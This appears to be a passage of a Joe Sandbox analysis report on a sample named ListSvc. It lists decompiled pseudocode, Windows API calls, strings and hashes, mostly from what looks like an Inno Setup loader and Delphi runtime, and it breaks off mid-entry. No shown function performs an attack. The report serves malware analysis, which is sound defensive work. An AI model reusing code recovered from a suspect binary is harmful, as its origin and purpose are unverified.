Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718

Strings

MZP, xrefs: 00407827

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: MZP
API String ID: 3490077880-2889622443
Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F

Uniqueness

Uniqueness Score: -1.00%

Function 004B5000, Relevance: 6.0, APIs: 4, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E004B5000(void* __ecx, void* __edx) {
				intOrPtr _t19;
				intOrPtr _t22;

				_push(_t22);
				_push(0x4b50d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t22;
				 *0x4bb98c =  *0x4bb98c - 1;
				if( *0x4bb98c < 0) {
					E00405B74();
					E004051A8();
					SetThreadLocale(0x400); // executed
					E0040A250();
					 *0x4b700c = 2;
					 *0x4bb01c = 0x4036b0;
					 *0x4bb020 = 0x4036b8;
					 *0x4bb05a = 2;
					 *0x4bb060 = E0040CAA4();
					 *0x4bb008 = 0x4095a0;
					E00405BCC(E00405BB0());
					 *0x4bb068 = 0xd7b0;
					 *0x4bb344 = 0xd7b0;
					 *0x4bb620 = 0xd7b0;
					 *0x4bb050 = GetCommandLineW();
					 *0x4bb04c = E00403810();
					 *0x4bb97c = GetACP();
					 *0x4bb980 = 0x4b0;
					 *0x4bb044 = GetCurrentThreadId();
					E0040CAB8();
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x4b50de);
				return 0;
			}

0x004b5005
0x004b5006
0x004b500b
0x004b500e
0x004b5011
0x004b5018
0x004b501e
0x004b5023
0x004b502d
0x004b5032
0x004b5037
0x004b503e
0x004b5048
0x004b5052
0x004b505e
0x004b5063
0x004b5072
0x004b5077
0x004b5080
0x004b5089
0x004b5097
0x004b50a1
0x004b50ab
0x004b50b0
0x004b50bf
0x004b50c4
0x004b50c4
0x004b50cb
0x004b50ce
0x004b50d1
0x004b50d6

APIs

SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D

Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4

Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8

GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092

Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821

GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
GetCurrentThreadId.KERNEL32 ref: 004B50BA

Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
String ID:
API String ID: 2740004594-0
Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE

Uniqueness

Uniqueness Score: -1.00%

Function 004AEFE8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x4af0e1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E00422D70( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						E00426F08(0x3d,  &_v32, _v8);
						_v28 = _v32;
						E00419E18( &_v36, _t54, 0);
						_v24 = _v36;
						E004232EC(_t54,  &_v40);
						_v20 = _v40;
						E00426ED8(0x81, 2,  &_v28,  &_v16);
						_t55 = _v16;
						E0041F264(_v16, 1);
						E0040711C();
					}
				}
				E00407E00(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E004AF0E8);
				E00407A80( &_v40, 3);
				return E00407A80( &_v16, 3);
			}

0x004aefe8
0x004aefe8
0x004aefe9
0x004aefeb
0x004aeff0
0x004aeff0
0x004aeff2
0x004aeff4
0x004aeff4
0x004aeff7
0x004aeff8
0x004aeffa
0x004aeffc
0x004aeffe
0x004aefff
0x004af004
0x004af007
0x004af00a
0x004af011
0x004af019
0x004af020
0x004af030
0x004af037
0x00000000
0x00000000
0x004af03e
0x004af040
0x004af046
0x004af056
0x004af05e
0x004af06a
0x004af072
0x004af07a
0x004af082
0x004af091
0x004af096
0x004af0a0
0x004af0a5
0x004af0a5
0x004af046
0x004af0b4
0x004af0b9
0x004af0bb
0x004af0be
0x004af0c1
0x004af0ce
0x004af0e0

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039

Strings

.tmp, xrefs: 004AF019

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00405740();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00405730(_t13);
				return _t24;
			}

0x0040e457
0x0040e45c
0x0040e45e
0x0040e48f
0x0040e498
0x0040e4a4

APIs

CreateWindowExW.USER32 ref: 0040E48F

Strings

InnoSetupLdrWindow, xrefs: 0040E453
STATIC, xrefs: 0040E48D

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: CreateWindow
String ID: InnoSetupLdrWindow$STATIC
API String ID: 716092398-2209255943
Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004AF1B4, Relevance: 5.0, APIs: 4, Instructions: 45
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E00427154(_t9, _v8, _t19); // executed
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}

0x004af1b4
0x004af1bb
0x004af1be
0x004af1c2
0x004af1c5
0x004af213
0x004af213
0x004af213
0x004af1c7
0x004af1c8
0x004af1ca
0x004af1ca
0x004af1cd
0x004af1da
0x004af1dd
0x004af1e3
0x004af1e3
0x004af1cf
0x004af1d3
0x004af1d3
0x004af1ed
0x004af1f4
0x00000000
0x00000000
0x004af1f6
0x004af1fe
0x00000000
0x00000000
0x004af200
0x004af208
0x00000000
0x00000000
0x004af20a
0x004af20b
0x004af20c
0x00000000
0x00000000
0x00000000
0x004af20c
0x00000000

APIs

Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF94, Relevance: 4.6, APIs: 3, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
				char _v8;
				char _v9;
				int _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _t33;
				int _t43;
				int _t64;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int* _t77;
				signed int* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffe8;
				_v8 = 0;
				_t77 = __ecx;
				_t79 = __edx;
				_push(_t81);
				_push(0x420094);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_v9 = 0;
				E00407E48( &_v8, __eax);
				E00407FB0( &_v8);
				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
				_t64 = _t33;
				if(_t64 == 0) {
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(0x42009b);
					return E00407A20( &_v8);
				} else {
					_v20 = E004053F0(_t64);
					_push(_t81);
					_push(0x420077);
					_push( *[fs:edx]);
					 *[fs:edx] = _t83;
					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
						_v9 = 1;
					}
					_pop(_t74);
					 *[fs:eax] = _t74;
					_push(0x42007e);
					return E0040540C(_v20);
				}
			}

0x0041ff95
0x0041ff97
0x0041ff9f
0x0041ffa2
0x0041ffa4
0x0041ffaa
0x0041ffab
0x0041ffb0
0x0041ffb3
0x0041ffb6
0x0041ffbf
0x0041ffc7
0x0041ffd9
0x0041ffde
0x0041ffe2
0x00420080
0x00420083
0x00420086
0x00420093
0x0041ffe8
0x0041ffef
0x0041fff4
0x0041fff5
0x0041fffa
0x0041fffd
0x00420012
0x00420019
0x00420041
0x0042004a
0x0042005b
0x0042005d
0x0042005d
0x00420063
0x00420066
0x00420069
0x00420076
0x00420076

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue
String ID:
API String ID: 2179348866-0
Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765

Uniqueness

Uniqueness Score: -1.00%

Function 0040B110, Relevance: 3.1, APIs: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				E00407B04(_v12);
				_push(_t84);
				_push(0x40b227);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E00407A20(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E0040B22E);
					return E00407A80( &_v28, 6);
				}
				E00407E48( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
					if(_v16 == 0) {
						L00403730();
						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x4bdc0c;
							if( *0x4bdc0c == 0) {
								L00403738();
								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E0040B044(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E004088AC(_v12, _t60, 1,  &_v20);
				goto L7;
			}

0x0040b110
0x0040b110
0x0040b113
0x0040b115
0x0040b117
0x0040b119
0x0040b11b
0x0040b11d
0x0040b11f
0x0040b120
0x0040b121
0x0040b123
0x0040b126
0x0040b12c
0x0040b134
0x0040b13b
0x0040b13c
0x0040b141
0x0040b144
0x0040b149
0x0040b152
0x0040b20c
0x0040b20e
0x0040b211
0x0040b214
0x0040b226
0x0040b226
0x0040b15e
0x0040b163
0x0040b168
0x0040b16d
0x0040b16d
0x0040b16f
0x0040b174
0x0040b19b
0x0040b1a1
0x0040b1aa
0x0040b1bb
0x0040b1c3
0x0040b1d0
0x0040b1d5
0x0040b1d8
0x0040b1da
0x0040b1e1
0x0040b1e3
0x0040b1eb
0x0040b1f8
0x0040b1f8
0x0040b1e1
0x0040b1fd
0x0040b200
0x0040b207
0x0040b207
0x0040b1ac
0x0040b1b4
0x0040b1b4
0x00000000
0x0040b1aa
0x0040b176
0x0040b196
0x0040b197
0x0040b199
0x00000000
0x00000000
0x00000000
0x0040b199
0x0040b185
0x0040b18f
0x00000000

APIs

GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: DefaultLanguage$SystemUser
String ID:
API String ID: 384301227-0
Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B234, Relevance: 3.1, APIs: 2, Instructions: 55
libraryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x40b2ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E00408550( &_v536, _t49);
				_push(_v536);
				E0040858C( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E004084EC(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E0040B2F5);
				E00407A80( &_v540, 2);
				return E00407A20( &_v8);
			}

0x0040b241
0x0040b247
0x0040b24d
0x0040b250
0x0040b254
0x0040b255
0x0040b25a
0x0040b25d
0x0040b270
0x0040b27d
0x0040b288
0x0040b29a
0x0040b2a8
0x0040b2a9
0x0040b2b2
0x0040b2c1
0x0040b2c6
0x0040b2ca
0x0040b2cd
0x0040b2d0
0x0040b2e0
0x0040b2ed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: FileLibraryLoadModuleName
String ID:
API String ID: 1159719554-0
Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00427154, Relevance: 3.0, APIs: 2, Instructions: 42
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00427154(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00427108(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x4271b1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E004084EC(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E004271B8);
					return E00427144( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}

0x00427155
0x00427157
0x0042716c
0x00427177
0x00427178
0x0042717d
0x00427180
0x0042718b
0x00427190
0x00427198
0x0042719d
0x004271a0
0x004271a3
0x004271b0
0x0042716e
0x00427170
0x004271c9
0x004271c9

APIs

DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
